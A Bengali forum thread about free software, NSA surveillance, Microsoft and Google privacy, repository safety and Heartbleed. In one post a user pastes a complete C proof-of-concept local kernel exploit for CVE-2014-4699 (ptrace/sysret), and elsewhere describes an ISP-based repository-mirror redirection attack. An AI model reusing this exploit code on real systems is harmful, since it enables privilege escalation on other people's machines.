আপনি প্রবেশ করেন নি। দয়া করে নিবন্ধন অথবা প্রবেশ করুন
প্রজন্ম ফোরাম » তথ্য ও যোগাযোগ প্রযুক্তি » ওপেন সোর্স ও বাংলা কম্পিউটিং » "সফটওয়্যার মুক্তি দিবস - ২০১৪" বাংলাদেশ
FinFisher (formerly part of the UK based Gamma Group International until late 2013) is a German company that produces and sells computer intrusion systems, software exploits and remote monitoring systems that are capable of intercepting communications and data from OS X, Windows and Linux computers as well as Android, iOS, BlackBerry, Symbian and Windows Mobile devices.
এই মানসিকতার জন্যই আপনি এখনও xpতে পড়ে আছেন..... দাসত্ব থেকে মুক্তি পেলেন না...
মানব ইতিহাসের সেরা ওএসকে বাদ দিতে মন চায় না। এখন মাইক্রোসফটের উচিৎ এক্সপি কে ফ্রি বলে ঘোষনা দেওয়া।
লেখাটি LGPL এর অধীনে প্রকাশিত
যোদ্ধা বলতে যদি আপনি সরাসরি অস্ত্রহাতে যুদ্ধে নামা বোঝেন তবে আর কিছুই বলবার নেই। গুগল তাঁর ব্যবহারকারীদের তথ্যের নিরাপত্তা দিতে গিয়ে মার্কিন গোয়েন্দা সংস্থার বিরুদ্ধে কোর্টে যাওয়ায় মার্কিন সরকার কর্তৃক সরাসরি ""দেশপ্রেমিক নয়'' আখ্যা পেয়ে বসে আছে। স্বেচ্ছাসেবা আর ব্যবসায়িক প্রতিষ্ঠানের কর্মপদ্ধতি আর নীতিমালা বিবেচনায় রেখে মুক্তপ্রযুক্তির আন্দোলনে গুগলের অবদানটুকু সময়সুযোগ মতো জানবার চেষ্টা করুন। আশা করি তখন আর আমার কথাগুলো অতটা তিক্ত ঠেকবে না।
গুগলের প্রাইভেসি লংঘন মানে কেবল এন.এস.একে তথ্য দেয়া নিশ্চয়ই নয়। তা ভাই দেশপ্রেমিক নয় হিসাবে কেবল গুগলই এল কেন ওদের সহযোগী হিসাবে মাইক্রোসফটের নামটাওতো আসা উচিত ছিল। ওপেন সোর্সে গুগলের মত না হলেও অল্প বিস্তর হলেও অবদান মাইক্রোসফটেরও আছে যেমন - Hadoop, Samba এবং খোদ লিনাক্স।
তৌফিক ইমাম লিখেছেন:প্রোগ্রাম ম্যানিপুলেট করুক, কিন্তু মেইন রিপোতে সেই ম্যানিপুলেট করা প্রোগ্রাম ইচ্ছা করলেই ঢুকানো যায় নাকি?
মনে করেন, স্কাইপ সেটাপ করবেন, লেটেষ্ট ভার্সন মাইক্রোসফটের সাইট থেকেই নামালেন। বাকিটুকু আর নাই কইলাম।
প্রিয় মেহেদী৮৩ ভাই, মেইন রিপোতে না থাকলেই তো সাধারন ব্যবহারকারীরা অভিজ্ঞতা না থাকায় সচরাচর তৃতীয় পক্ষের রিপো নিয়ে নাড়াচাড়ায় যাবে না। মেইন রিপো নিরাপদ কি না সেই প্রশ্নের উত্তরে তৃতীয় পক্ষের রিপো টেনে উদাহরন দেয়াটা একটু বাহুল্য হচ্ছে না কি?
তৌফিক ইমামের আগ্রহটা ছিলো মুক্ত সফটওয়্যার রিপোজিটরী তে থাকা সফটওয়্যারের নিরাপত্তা নিয়ে। মুক্ত সফটওয়্যার রিপোরজিটরীতে তৃতীয় পক্ষের দেয়া ক্ষতিকারক প্রোগ্রাম ইনজেক্ট বা অনুপ্রবেশ ঘটিয়ে দেয়া সম্ভব কি না সেটাই তিনি স্পষ্ট করে জানতে চাইছিলেন। আমার মনে হয়নি যে তৌফিক ইমামের প্রশ্ন কোট করে দেয়া আপনার এই উত্তরটা সরাসরি ওনার প্রশ্নের জবাব ছিলো আর তাই আমার বক্তব্যগুলো শুধুমাত্র আপনার বক্তব্যে শুরু হওয়া মনের বিভ্রান্তি দূর করতেই করা ছিলো, অন্য কিছু নয়।
আশা করি আমার কথাগুলোকে একেবারেই ব্যক্তিগত পর্যায়ের রেষারেষি হিসাবে নেবেন না। আমি শুধুমাত্র চাইছিলাম যেনো আপনার কথার এই লগ ধরে কোন নবীন ব্যবহারকারী এটা ধারনা করে না বসেন যে, যে কোন ব্যক্তি বা প্রতিষ্ঠান চাইলেই নিজের ক্ষতিকারক সফটওয়্যার/টুলস সরাসরি মুক্তপ্রযুক্তি ভিত্তিক রিপোজিটরীগুলোয় যুক্ত করে দিতে পারে। এটা যে মোটামুটি অসম্ভব পর্যায়ের একটা কাজ সেটুকু স্পষ্ট করে বোঝাতেই আমি এতক্ষন কথা বলছিলাম।
লেখাটি CC by-nc-sa 3.0 এর অধীনে প্রকাশিত
১। এনক্রিপটেড কিংবা টানেলড ডাটাও দেখতে পায়? (সব ও এস এর জন্যই প্রযোজ্য )
২। প্রোগ্রাম ম্যানিপুলেট করুক, কিন্তু মেইন রিপোতে সেই ম্যানিপুলেট করা প্রোগ্রাম ইচ্ছা করলেই ঢুকানো যায় নাকি? :p
( hash চেকিং এর ব্যাপার না হয় বাদই দিলাম)
১। যায় দাদা।
২। DNS স্পুফিং / DNS হাইজেকিং এর ব্যাপারটা জানেন ? আপনাকে দেখাবে যে আপনি দাদা বাড়ী যাচ্ছেন , কিন্তু আপনাকে নানাবাড়ী পাঠিয়ে দিবে।
প্যাচালে যেতে চাচ্ছি না, তাই অফ যাচ্ছি।
@শামিম দাদা, আমি কারো প্রাইভেট ডাটাতে হাত দেওয়া সমর্থন করিনা।
একটা ব্যাপার আমাদের উইকিলিক্স ডাটা কিভাবে কালেক্ট করেন সেটা তো জানেন তাইনা? ওটা কি প্রাইভেসির আওতায় পড়ে না ? সে তো একেকটা দেশের সরকার নিয়ে কানামাছি খেলছে।
আচ্ছা মাইক্রোসফট যে পাব্লিকের ডাটা NSA এর কাছে বেচে দিচ্ছে এটার ব্যাপারে জানতে চাচ্ছি। ডাটা কি আমার পিসি থেকে মেরে দিচ্ছে ? আমার ফায়ারওয়ালে আপডেট দেওয়ার সময় ছাড়া কখনো মাইক্রোসফট এর সাইটের ডাটা ট্রান্সমিট হতে দেখি না। কেউ বলবেন কি কিভাবে ধরতে পারি এই চুরি ?
তৌফিক ইমাম লিখেছেন:২। প্রোগ্রাম ম্যানিপুলেট করুক, কিন্তু মেইন রিপোতে সেই ম্যানিপুলেট করা প্রোগ্রাম ইচ্ছা করলেই ঢুকানো যায় নাকি? :p
( hash চেকিং এর ব্যাপার না হয় বাদই দিলাম)২। DNS স্পুফিং / DNS হাইজেকিং এর ব্যাপারটা জানেন ? আপনাকে দেখাবে যে আপনি দাদা বাড়ী যাচ্ছেন , কিন্তু আপনাকে নানাবাড়ী পাঠিয়ে দিবে। প্যাচালে যেতে চাচ্ছি না, তাই অফ যাচ্ছি।
মুক্ত সফটওয়্যার রিপোতে ম্যানিপুলেট করা/ক্ষতিকারক কোড যুক্ত হওয়া প্রোগ্রাম/টুলস কিভাবে যুক্ত করতে হয় সেই বিষয়ক টিউটোরিয়াল/নির্দেশনা চাই। যদি ঘুষখোর কোন প্যাকেজ মেইনটেইনারের তথ্য থাকে তো গো.বা তে দিয়েন। হাজার হোক বাঙ্গালি বুদ্ধি তো, কোন দিন কোন কাজে লেগে যায়!!! 
আর কিভাবে ডেক্সটপ/ডিভাইসে রান করা মুক্তপ্রযুক্তি ভিত্তিক প্রোগ্রাম ডিএনএস স্পুফিং করে জানতে চাই। ক্রোমিয়াম কিংবা ফায়ারফক্স প্রোগ্রাম ব্যবহার করে ব্যবহারকারী নয় বরংচ ক্রোমিয়াম কিংবা ফায়ারফক্স সরাসরি কিভাবে এই ধরনের কাজে ব্যবহাকারীকে ধোঁকা দিতে সহায়তা করে/করেছে সেই বিষয়টা একটু বিস্তারিত যদি বলতেন?
@শামিম দাদা, আমি কারো প্রাইভেট ডাটাতে হাত দেওয়া সমর্থন করিনা।
একটা ব্যাপার আমাদের উইকিলিক্স ডাটা কিভাবে কালেক্ট করেন সেটা তো জানেন তাইনা? ওটা কি প্রাইভেসির আওতায় পড়ে না ? সে তো একেকটা দেশের সরকার নিয়ে কানামাছি খেলছে।
উইকিলিকস কোন তথ্য গুগল বা ফেসবুকের মতো সরাসরি সংগ্রহ করে না কিংবা বলা যায় ওঁদেরকে কেউ তথ্য যেচে দিলে তবেই সেটা নেয়া হয়। তথ্যগুলো যাচাই বাছাই করে নিশ্চিত হবার পর সেগুলো তথ্য সরবরাহকারীর তথ্য শুধুমাত্র গোপন নয় বরংচ একেবারে নিশ্চিহ্ন করে তারপরই তথ্যগুলো লিক/প্রকাশ করা হয়। এক্ষেত্রে ব্যক্তিগত তথ্যের নিরাপত্তা লংঘিত হচ্ছে না সেটা পূর্ণরূপে নিশ্চিত করে উইকিলিকস।
ইংরেজী "প্রাইভেট' শব্দটা ব্যবহৃত হয় ব্যক্তি তথ্য বা একান্ত ব্যক্তিগত কিছু বোঝাতে। সরকারী বা জনসাধারনের বা সামগ্রিক বা সাংগঠনিক তথ্যের ক্ষেত্রে এগুলোকে বলে "ক্লাসিফাইড' বা "গোপনীয় তথ্য'। দুটো কাছাকাছি হলেও একই জিনিষ না।
জনসাধারন কিংবা জনগোষ্ঠীর বিরুদ্ধে করা কিংবা করার পরিকল্পনার দালিলিক প্রমানগুলোকেই সাধারনত ক্ষমতাসীনেরা অনেক চেষ্টা চরিত্র করে "ক্লাসিফাইড' বা "গোপনীয় তথ্য' হিসেবে লুকানো/আড়ালের প্রচেষ্টা চালান। আপনার কি মনে হয় এই অপকর্মগুলো ঠিকঠাক মতো ঢেকে রাখাই সঠিক?
আচ্ছা মাইক্রোসফট যে পাব্লিকের ডাটা NSA এর কাছে বেচে দিচ্ছে এটার ব্যাপারে জানতে চাচ্ছি। ডাটা কি আমার পিসি থেকে মেরে দিচ্ছে ? আমার ফায়ারওয়ালে আপডেট দেওয়ার সময় ছাড়া কখনো মাইক্রোসফট এর সাইটের ডাটা ট্রান্সমিট হতে দেখি না। কেউ বলবেন কি কিভাবে ধরতে পারি এই চুরি?
এইখান থেকে একটু ঘুরে আসেন। এখানে মূলকথাগুলো যা বলেছে --
• Microsoft helped the NSA to circumvent its encryption to address concerns that the agency would be unable to intercept web chats on the new Outlook.com portal;
• The agency already had pre-encryption stage access to email on Outlook.com, including Hotmail;
• The company worked with the FBI this year to allow the NSA easier access via Prism to its cloud storage service SkyDrive, which now has more than 250 million users worldwide;
• Microsoft also worked with the FBI's Data Intercept Unit to "understand" potential issues with a feature in Outlook.com that allows users to create email aliases;
• In July last year, nine months after Microsoft bought Skype, the NSA boasted that a new capability had tripled the amount of Skype video calls being collected through Prism;
• Material collected through Prism is routinely shared with the FBI and CIA, with one NSA document describing the program as a "team sport".
এইটা, এইটা এবং এইটাও একটু দেইখেন।
আপনি যদি এমএস এর স্কাইড্রাইভ প্রযুক্তি ব্যবহার করে থাকেন তবে নিজের সিস্টেম ডিস্কে থাকা তথ্যের সাথে ওটাকে নিয়মিত হালনাগাদ করার বা হার্ডডিস্কে রিডরাইট করার অনুমোদন তো দিয়েই থাকেন। বাকীটা বুঝে নিতে আশা করি কষ্ট হবে না।
লেখাটি CC by-nc-sa 3.0 এর অধীনে প্রকাশিত
মুক্ত সফটওয়্যার রিপোতে ম্যানিপুলেট করা/ক্ষতিকারক কোড যুক্ত হওয়া প্রোগ্রাম/টুলস কিভাবে যুক্ত করতে হয় সেই বিষয়ক টিউটোরিয়াল/নির্দেশনা চাই।
আপনি চাইলেই তো আমি লিনাক্স কার্নেল ৩.১৭ এর রুট এক্সপ্লোয়িট দিয়ে দিব না।
আর কিভাবে ডেক্সটপ/ডিভাইসে রান করা মুক্তপ্রযুক্তি ভিত্তিক প্রোগ্রাম ডিএনএস স্পুফিং করে জানতে চাই। ক্রোমিয়াম কিংবা ফায়ারফক্স প্রোগ্রাম ব্যবহার করে ব্যবহারকারী নয় বরংচ ক্রোমিয়াম কিংবা ফায়ারফক্স সরাসরি কিভাবে এই ধরনের কাজে ব্যবহাকারীকে ধোঁকা দিতে সহায়তা করে/করেছে সেই বিষয়টা একটু বিস্তারিত যদি বলতেন?
২০১০ টাইগার মেট (সার্চ করেন এটাই এনাফ)
আপনার ISP চাইলেই আপনাকে ফেইক গুগোলে পাঠিয়ে দিতে পারে। যার এড্রেস সেম অরিজিনাল গুগোলের মতই।
উইকিলিকস কোন তথ্য গুগল বা ফেসবুকের মতো সরাসরি সংগ্রহ করে না কিংবা বলা যায় ওঁদেরকে কেউ তথ্য যেচে দিলে তবেই সেটা নেয়া হয়।
তাই নাকি ? তাইলে এনোনিমাস তাদেরকে ডাটা কোথা থেকে দিল ? এই যে 678,000 ইমেইল গুলো কি তাদের মালিকরা এ্যনোনিমাসের কাছে পাঠিয়ে দিয়েছে ?
আপনি যদি এমএস এর স্কাইড্রাইভ প্রযুক্তি ব্যবহার করে থাকেন তবে নিজের সিস্টেম ডিস্কে থাকা তথ্যের সাথে ওটাকে নিয়মিত হালনাগাদ করার বা হার্ডডিস্কে রিডরাইট করার অনুমোদন তো দিয়েই থাকেন। বাকীটা বুঝে নিতে আশা করি কষ্ট হবে না।
ওয়ান ড্রাইভ , গুগোল ড্রাইভ , কপি , ড্রপবক্স ব্লা ব্লা ব্লা ... কে কি রাইট পারমিশন দিতে হয় না ?
http://www.wnd.com/2013/06/nsa-has-tota … t-windows/
ADVAPI.DLL নামে কোন জিনিশ আমার সিস্টেমে দেখি নাই ।
আর হার্ডয়্যারে মানে চিপে যদি স্পাইওয়্যার প্রোগ্রাম করে দেয় সেটা কি কোন অপারেটিং সিস্টেমের জন্য ফিক্সড ?
একটা কথা বলি , আপনি যদি ব্যাকডোর দেখতে পান তাহলে সেটা দেখিয়ে দিন, আমি রিমুভ মারি। যদি সিস্টেম ফল্ট করে তাইলে পয়সা দিয়ে কেনা ৮ ফেলে দিব। ২ টা ফায়ারওয়াল ব্যবহার করি কে কি নিচ্ছে দেখার জন্য।
আপনি চাইলেই তো আমি লিনাক্স কার্নেল ৩.১৭ এর রুট এক্সপ্লোয়িট দিয়ে দিব না।
ভাই এখন অবদি স্টেবল আর রিপো তে আসা কার্নেল হলো ৩.১৬.২। আপনি তো দেখি আরসি বা রিলিজ ক্যান্ডিডেট নিয়ে মাতামাতি জুড়ে দিয়েছেন। যাই হোক যদি আদৌ কোন ফোঁকড় খুঁজে পেয়ে থাকেন তবে অনুগ্রহ করে আপনি সেটাকে রিপোর্ট না করে বসে থাকুন। দেখুন তো রিলিজ হবার পর আপনার সেই রুট এক্সপ্লয়েট কাজ করে কি না?
আর আপনি যেদিন ওই সংস্করনটা ইন্সটল করবেন তো জানাবেন। আমি নিজেও একই সংস্করন আমার পছন্দের রিপো থেকে নামিয়ে নিয়ে ইন্সটল করবো আমার সিস্টেমে। তারপর দেখবার ইচ্ছে যে সেই এক্সপ্লয়েট ব্যবহার করে আপনি কতটা তথ্য হাতিয়ে নেন আমার ব্যক্তিগত সিস্টেম থেকে কিংবা আমার সিস্টেমের ক্ষতিসাধন করেন।
আর সাইফুল_বিডি ভাই, আমি জানতে চেয়েছিলাম যে নিজের ডেস্কটপে নয় বরংচ মুক্ত সফটওয়্যার রিপোতে ম্যানিপুলেট করা/ক্ষতিকারক কোড যুক্ত হওয়া প্রোগ্রাম/টুলস কিভাবে যুক্ত করতে হয় সেই বিষয়ক টিউটোরিয়াল/নির্দেশনা। আশা করি গো.বা দিয়ে হলেও পরামর্শটা দেবেন।
২০১০ টাইগার মেট (সার্চ করেন এটাই এনাফ)। আপনার ISP চাইলেই আপনাকে ফেইক গুগোলে পাঠিয়ে দিতে পারে। যার এড্রেস সেম অরিজিনাল গুগোলের মতই।
ভাই আমি ডিএনএস স্পুফিং এর সাথে ডেক্সটপ/ডিভাইসে রান করা মুক্তপ্রযুক্তি ভিত্তিক প্রোগ্রামের লিংক/সম্পর্কটা জানতে চাইছিলাম। উদাহরন হিসেবে ক্রোমিয়াম কিংবা ফায়ারফক্স সরাসরি কিভাবে এই ধরনের কাজে ব্যবহাকারীকে ধোঁকা দিতে সহায়তা করে/করেছে সেই বিষয়টা একটু বিস্তারিত আলোকপাত করলে কিংবা দুটো লিংক ধরিয়ে দিলে খুবই উপকৃত হতাম।
মূলত আমার জানতে চাইবার আগ্রহ এই জন্যে যে মুক্তপ্রযুক্তি যে সব সফটওয়্যার আমি ব্যবহার করছি বিগত প্রায় একযুগেরও বেশী সময় ধরে সেগুলোর বিরুদ্ধে এই রকমের অপকর্মে সরাসরি কিংবা পরোক্ষভাবে যুক্ত থাকার বিষয়ে কিছুই জানিনা। কখনো সখনো যদি বাগ/ত্রুটি ধরা পড়েছে তো যথাজলদি সমাধা হতেই দেখেছি। যদি আপনার কাছ থেকে পরামর্শ পেয়ে নতুন কিছু বিষয়ে জানতে-শিখতে পারি তো খুবই খুশি হবো।
রিং লিখেছেন:উইকিলিকস কোন তথ্য গুগল বা ফেসবুকের মতো সরাসরি সংগ্রহ করে না কিংবা বলা যায় ওঁদেরকে কেউ তথ্য যেচে দিলে তবেই সেটা নেয়া হয়।
তাই নাকি ? তাইলে এনোনিমাস তাদেরকে ডাটা কোথা থেকে দিল ? এই মে678,000 ইলগুলো কি তাদের মালিকরা এ্যনোনিমাসের কাছে পাঠিয়ে দিয়েছে ?
ভাই আশা করি anonymous শব্দটার অর্থ জানা আছে আর আপনারই দেয়া লিংক থেকে এইটুকু কেটে নিয়ে উল্লেখ করছি -- ""anonymous-hackers-help-wikileaks-to-get ''।
লেখাটি CC by-nc-sa 3.0 এর অধীনে প্রকাশিত
আমি বড় মানুষ একটা ছোট কথা জানতে চাই। শুনেছি heartbleed ওয়ালা OpenSSL নাকি রিপোতে পাওয়া যাইত? এইটা নাকি মুক্ত মানুষের বদলে একটা সরকারি এজেন্সি আবিষ্কার করছিল? তাইলে রিপো মেইনটেইনাররা কি করতেছিল?
মুক্ত সফটওয়্যার ভাল জিনিস। এর প্রচারে ঢোল-বাদ্যি বাজানোও ভাল জিনিস। কিন্তু বাজনার তাল-লয়-মাত্রা জ্ঞান থাকা আবশ্যক। তবলার উপর চাটি মারতে পারলেই কি আর তবলচি হওয়া যায়? সেটা কি মানুষকে বিরক্তি বৈ আনন্দ দিতে পারে?
আহা, কতিপয় জ্ঞানী ব্যাক্তির সিকিউরিটি সম্পর্কে জ্ঞান দেখে চোখে পানি চলে আসলো।
/**
* CVE-2014-4699 ptrace/sysret PoC
* by Vitaly Nikolenko
* vnik@hashcrack.org
*
* > gcc -O2 poc_v0.c
*
* This code is kernel specific. On Ubuntu 12.04.0 LTS (3.2.0-23-generic), the
* following will trigger the #GP in sysret and overwrite the #PF handler so we
* can land to our NOP sled mapped at 0x80000000.
* However, once landed, the IDT will be trashed. We can either attempt to
* restore it (then escalate privileges and execute our shellcode) or find
* something else to overwrite that would transfer exec flow to our controlled
* user-space address. Since 3.10.something, IDT is read-only anyway. If you
* have any ideas, let me know.
*/
#include <stdio.h>
#include <stdint.h>
#include <assert.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/syscall.h>
#include <sys/user.h>
#include <unistd.h>
#include <sys/mman.h>
#include <errno.h>
#define SIZE 0x10000000
typedef int __attribute__((regparm(3))) (*commit_creds_fn)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(unsigned long cred);
unsigned long __user_cs;
unsigned long __user_ss;
unsigned long __user_rflags;
void __attribute__((regparm(3))) payload() {
uint32_t *fixptr = (void*)0xffffffff81dd70e8;
// restore the #PF handler
*fixptr = -1;
//commit_creds_fn commit_creds = (commit_creds_fn)0xffffffff81091630;
//prepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)0xffffffff810918e0;
//commit_creds(prepare_kernel_cred((uint64_t)NULL));
//__asm__ volatile ("swapgs\n\t"
// "...");
}
int main() {
struct user_regs_struct regs;
uint8_t *trampoline, *tmp;
int status;
struct {
uint16_t limit;
uint64_t addr;
} __attribute__((packed)) idt;
// MAP_POPULATE so we don't trigger extra #PF
trampoline = mmap(0x80000000, SIZE, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_FIXED|MAP_POPULATE|MAP_GROWSDOWN, 0,0);
assert(trampoline == 0x80000000);
memset(trampoline, 0x90, SIZE);
tmp = trampoline;
tmp += SIZE-1024;
memcpy(tmp, &payload, 1024);
memcpy(tmp-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf", 13);
pid_t chld;
if ((chld = fork()) < 0) {
perror("fork");
exit(1);
}
if (chld == 0) {
if (ptrace(PTRACE_TRACEME, 0, 0, 0) != 0) {
perror("PTRACE_TRACEME");
exit(1);
}
raise(SIGSTOP);
fork();
return 0;
}
asm volatile("sidt %0" : "=m" (idt));
printf("IDT addr = 0x%lx\n", idt.addr);
waitpid(chld, &status, 0);
ptrace(PTRACE_SETOPTIONS, chld, 0, PTRACE_O_TRACEFORK);
ptrace(PTRACE_CONT, chld, 0, 0);
waitpid(chld, &status, 0);
ptrace(PTRACE_GETREGS, chld, NULL, ®s);
regs.rdi = 0x0000000000000000;
regs.rip = 0x8fffffffffffffff;
regs.rsp = idt.addr + 14*16 + 8 + 0xb0 - 0x78;
// attempt to restore the IDT
regs.rdi = 0x0000000000000000;
regs.rsi = 0x81658e000010cbd0;
regs.rdx = 0x00000000ffffffff;
regs.rcx = 0x81658e000010cba0;
regs.rax = 0x00000000ffffffff;
regs.r8 = 0x81658e010010cb00;
regs.r9 = 0x00000000ffffffff;
regs.r10 = 0x81668e0000106b10;
regs.r11 = 0x00000000ffffffff;
regs.rbx = 0x81668e0000106ac0;
regs.rbp = 0x00000000ffffffff;
regs.r12 = 0x81668e0000106ac0;
regs.r13 = 0x00000000ffffffff;
regs.r14 = 0x81668e0200106a90;
regs.r15 = 0x00000000ffffffff;
ptrace(PTRACE_SETREGS, chld, NULL, ®s);
ptrace(PTRACE_CONT, chld, 0, 0);
ptrace(PTRACE_DETACH, chld, 0, 0);
}3.15.4 এর লোকাল রুট এক্সপ্লইট , দেখেন তো কিছু করতে পারেন কিনা (৩.১৫.৪ এ)।
anonymous শব্দটা একটু আপেক্ষিক , হ্যাকার কমিউনিটিতে anonymous কিভাবে ডাটা দিল এর মানে আছে। আর বাকীদের কাছে এটা না বুঝাটা দোষের না। anonymous একটা গ্রুপের নাম।
উদাহরন হিসেবে ক্রোমিয়াম কিংবা ফায়ারফক্স সরাসরি কিভাবে এই ধরনের কাজে ব্যবহাকারীকে ধোঁকা দিতে সহায়তা করে/করেছে সেই বিষয়টা একটু বিস্তারিত আলোকপাত করলে কিংবা দুটো লিংক ধরিয়ে দিলে খুবই উপকৃত হতাম।
স্পুফিং এর সাথে মজিলা / ক্রোমের সম্পর্ক কি সেটাই বুঝলাম না।
আপনাকে বুঝাই , যেহেতু আপনি গরিব মানুষ VPN / প্রাইভেট টানেল ব্যবহার করার ক্ষমতা আপনার নাই, সেহেতু আপনি আপনার লোকাল ISP র লাইন দিয়ে লিনাক্স এর মেইন রেপোতে ডুকলেন। এবার মুল কাহিনিতে আশা যাক, মনে করুন আমি সেই ISP মালিক, আমি আপনার কাঙ্খিত রেপোটির একটি মিরর করে আমার ISP সার্ভারে আপ করলাম , এবার আপনার রেপোটির লিংক সরাসরি হোস্ট মডিফাই করে আমার সার্ভারে লোকেট করে দিলাম। আর কিছু বলতে হবে ?
Anonymous supplies WikiLeaks wi..... এর মানে এই না যে এরা Anonymous হ্যাকার , এখানে Anonymous হ্যাকার গ্রুপকে ইন্ডিকেট করা হয়েছে।
এখানে Anonymous এর ক্লেইম দেখতে পারেন।
Anonymous hacktivists claimed responsibility for accessing the information and passing it on to the whistleblower organization.
আমি বড় মানুষ একটা ছোট কথা জানতে চাই। শুনেছি heartbleed ওয়ালা OpenSSL নাকি রিপোতে পাওয়া যাইত? এইটা নাকি মুক্ত মানুষের বদলে একটা সরকারি এজেন্সি আবিষ্কার করছিল? তাইলে রিপো মেইনটেইনাররা কি করতেছিল?
ভাই শাবাব, এইখান থেকে একটু দেখে নিলে জানতে ও জানাতে সুবিধা হতো। এই ওপেন এসএসএল ডেক্সটপ কম্পিউটিংয়ে ব্যবহৃত কোন নিয়মিত সফটওয়্যার বা টুলস নয় ফলে সাধারন ব্যবহারকারীদের কম্পিউটারে এটার দ্বারা কোনরূপ কোন ক্ষতিসাধনের সম্ভাবনা প্রায় নেই বললেই চলে। তবে হ্যাঁ এটা ঠিক যে অনলাইনে ব্যক্তিতথ্যের নিরাপত্তা অবশ্যই উভয়প্রান্তেই ক্ষতিগ্রস্ত হয়েছে। তদুপরি --
What versions of the OpenSSL are affected?
Status of different versions:
OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
OpenSSL 1.0.1g is NOT vulnerable
OpenSSL 1.0.0 branch is NOT vulnerable
OpenSSL 0.9.8 branch is NOT vulnerable
এই সফটওয়্যারের ত্রুটিটুকু এঁরাই
This bug was independently discovered by a team of security engineers (Riku, Antti and Matti) at Codenomicon and Neel Mehta of Google Security, who first reported it to the OpenSSL team. Codenomicon team found heartbleed bug while improving the SafeGuard feature in Codenomicon's Defensics security testing tools and reported this bug to the NCSC-FI for vulnerability coordination and reporting to OpenSSL team.
উন্মোচন করেছিলেন (৩রা এপ্রিল ২০১৪ইং) এবং যথাদ্রুত সম্ভব (৭ই এপ্রিল ২০১৪ইং) এই বাগ দূরীভূতও হয়েছে। উল্লেখ্য যে এটা আরোপিত কোন ক্ষতিকারক কোড ইচ্ছেকৃতভাবে সম্বলিত করে দেবার মতো কোন প্রয়াস ছিলো না। সফটওয়্যারে বিভিন্ন ত্রুটি হতেই পারে তবে কে বা কাঁরা সেটা সমাধান করতে সচেষ্ট হয় এবং কতটা জনস্বার্থের প্রতি লক্ষ্য রেখে কত দ্রুত সেটা করা হয় সেটাই আসলে দেখার বিষয়। এই প্রকল্পটা কিন্তু কোন বানিজ্যিক প্রকল্প নয় বরংচ মুক্তপ্রযুক্তির পথ চলতে প্রয়োজনীয় একটা উদ্যোগ যা এখনো অবদি স্বেচ্ছাসেবীতার মাধ্যমেই চলছে।
পয়সার বিনিময়ে কাজ করা ডেভেলপারদের সাথে যদি স্বেচ্ছাসেবায় করা কোন প্রকল্পের তুলনা করতে যাওয়া হয় তো সেটা অসম তুলনা। তারপরেও যদি স্বেচ্ছাসেবীতার সেই সব প্রকল্পগুলোই সর্বোচ্চ মাত্রার আউটপুট দিতে থাকে তো বলবার আর কি থাকে?
প্রিয় শাবাব, আমার জানামতে সফটওয়্যারের বাগ আর ইচ্ছেকৃতভাবে কারোর দ্বারা যোগ করা ক্ষতিকারক কোড/এক্সপ্লয়েট/ব্যাকডোর কিন্তু এক জিনিষ না। যদি দুটো একই জিনিষ হয়ে থাকে অনুগ্রহ করে আমাকে একটু জানাবে, বুঝিয়ে বলবে। আচ্ছা প্রযুক্তির জগতেই প্রশ্নের মুখে পড়া কোন সফটওয়্যারের ব্যাকডোর যদি মাসের পর মাস, বছরের পর বছর জুড়ে, একটা সংস্করন থেকে আরেকটা সংস্করনে বিভিন্ন নাম/চেহারা নিয়ে বজায় থাকে তবে কি সেটাকেও "বাগ'ই বলে? বিষয়গুলো নিয়ে সত্যিই আমি জানতে-শুনতে আগ্রহী।
স্পুফিং এর সাথে মজিলা / ক্রোমের সম্পর্ক কি সেটাই বুঝলাম না।
তৌফিক ইমামের করা প্রশ্নটা একটু খেয়াল করবেন কি? ওখানে জিজ্ঞেস করা হয়েছিলো যে যদি কেউ নিজে ম্যানিপুলেট করা সফটওয়্যার বানায়ও তবে সেটা কি মেইন রিপোতে ইনজেক্ট করতে পারবে কি না? আপনি তাঁর উত্তরে বলেছিলেন দাদবাড়ীর ঠিকানায় যাবার কথা বলে নানাবাড়ী চলে যাবে (ডিএনএস স্মুফিং)। যেহেতু ইন্টারনেটে যেতে হলে সাধারন ব্যবহারকারীরা কোন না কোন ব্রাউজার কিংবা ক্লায়েন্ট টুল/সফটওয়্যার ব্যবহার করবেন তাই সেরকমই দুটো ব্রাউজারের নামোল্লেখ করে জানতে চেয়েছিলাম মাত্র।
আপনাকে বুঝাই , যেহেতু আপনি গরিব মানুষ VPN / প্রাইভেট টানেল ব্যবহার করার ক্ষমতা আপনার নাই, সেহেতু আপনি আপনার লোকাল ISP র লাইন দিয়ে লিনাক্স এর মেইন রেপোতে ডুকলেন। এবার মুল কাহিনিতে আশা যাক, মনে করুন আমি সেই ISP মালিক, আমি আপনার কাঙ্খিত রেপোটির একটি মিরর করে আমার ISP সার্ভারে আপ করলাম , এবার আপনার রেপোটির লিংক সরাসরি হোস্ট মডিফাই করে আমার সার্ভারে লোকেট করে দিলাম। আর কিছু বলতে হবে ?
বুঝিয়ে বলবার জন্যে ধন্যবাদ। সাইফুল ভাই শুধুমাত্র মিররিং করে নিজের সার্ভারে প্যাকেজগুলো সব রাখলেই যদি প্যাকেজ ম্যানিপুলেট করে সিস্টেমে পুশ করতে পারতো যে কোন প্রযুক্তি প্রতিষ্ঠান তবে সেই কাজ না করে এনএসএ এর মতো প্রতিষ্ঠান আড়িপাতার রাস্তায় হাঁটতো না, ব্যাকডোর নিয়েও এতো খেলা খেলতো না।
আপনার নজরে বোধহয় তৌফিক ইমামের দেয়া প্রশ্নের মাঝেই হ্যাশ চেকিং সংক্রান্ত অংশটা বাদ পড়ে গিয়েছে। শুধু মূল রিপোর মিরর হলেই চলে যায় না একটা মিরর রিপোর প্যাকেজগুলো। ওগুলোর প্রতিটার হ্যাশসাম মিলতে হয় মূল সার্ভারে থাকা রিপোর প্যাকেজ হ্যাশসামের সাথে। আপনি যে সফটওয়্যার/টুলস ম্যানিপুলেট করবেন তাতে দুইটা লাইন/শব্দ হলেও তো যোগ/বিয়োগ করবেন? তাতেই কিন্তু প্যাকেজ বিল্ড করার পর হ্যাশসামে গড়মিল হয়ে যাবে।
